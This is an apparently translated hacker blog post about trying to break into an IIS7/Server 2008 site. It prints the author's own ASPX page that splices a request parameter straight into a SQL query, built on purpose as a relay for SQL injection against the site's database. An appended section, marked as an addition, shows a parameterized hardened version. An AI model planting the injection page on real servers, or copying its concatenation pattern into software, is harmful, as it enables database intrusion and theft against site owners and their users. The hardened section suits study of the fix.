Yesterday 4z1 and I were looking at a site. Privilege escalation was really hard; we spent a full 5 hours on it with no result. 2008 + IIS7, no sa, no root, no services of any kind...
Actually, in the middle of it we used aspx constructed injection to cross-site. I found a pile of code online and not one of them worked.
It's not much code, so I just wrote my own and was done with it. So annoying.
<%@ Page Language="C#" %>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head runat="server">
<title>暗影aspx构造注射专用页面</title>
</head>
<body>
<form id="form1" runat="server">
<div>
<script language="c#" runat="server">
void Page_Init(object sender, EventArgs e)
{
    // Open the connection string named in web.config ("连接名" is a placeholder).
    System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();
    conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ToString();
    conn.Open();

    string i = this.Page.Request.Params["xxser"]; // the parameter: ?xxser=1

    // The raw parameter is concatenated straight into the statement; this is the
    // injection point the page is built around ("[表]" and "列名" are placeholders).
    System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn);
    int x = command.ExecuteNonQuery();
    Response.Write(i + "\n");
    Response.Write(x);
    conn.Close();
}
</script>
</div>
</form>
</body>
</html>
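For comparison, the hardened counterpart of the page above, added here as an example and not part of the original post: the xxser value is parsed as an integer and bound as a typed SqlParameter instead of being concatenated into the statement, so a request can no longer change the structure of the query. Connection name, table and column are the same placeholders the original uses.

```csharp
<%@ Page Language="C#" %>
<%@ Import Namespace="System.Data" %>
<%@ Import Namespace="System.Data.SqlClient" %>
<%@ Import Namespace="System.Configuration" %>
<script runat="server">
    // Hardened version of the page above (added example, not the original author's code):
    // the request value is validated and bound as a parameter, never spliced into SQL text.
    void Page_Init(object sender, EventArgs e)
    {
        // Parse the parameter as an integer first and reject anything else.
        int id;
        if (!int.TryParse(Request.Params["xxser"], out id))
        {
            Response.StatusCode = 400;
            Response.Write("invalid parameter");
            return;
        }

        // "连接名", "[表]" and "[列名]" are placeholders, as in the original page.
        string cs = ConfigurationManager.ConnectionStrings["连接名"].ConnectionString;
        using (SqlConnection conn = new SqlConnection(cs))
        using (SqlCommand command = new SqlCommand(
            "SELECT COUNT(*) FROM [表] WHERE [列名] = @id", conn))
        {
            // A typed parameter carries the value separately from the statement text,
            // so the database never parses user input as SQL.
            command.Parameters.Add("@id", SqlDbType.Int).Value = id;
            conn.Open();
            int count = (int)command.ExecuteScalar();
            // Echo only the parsed integer and the row count, not the raw request input.
            Response.Write(id + "\n");
            Response.Write(count);
        }
    }
</script>
```

The same change applies to the original page's SELECT as well: ExecuteNonQuery returns -1 for a SELECT, so a result-returning command such as ExecuteScalar or ExecuteReader is the one that actually reports what the query found.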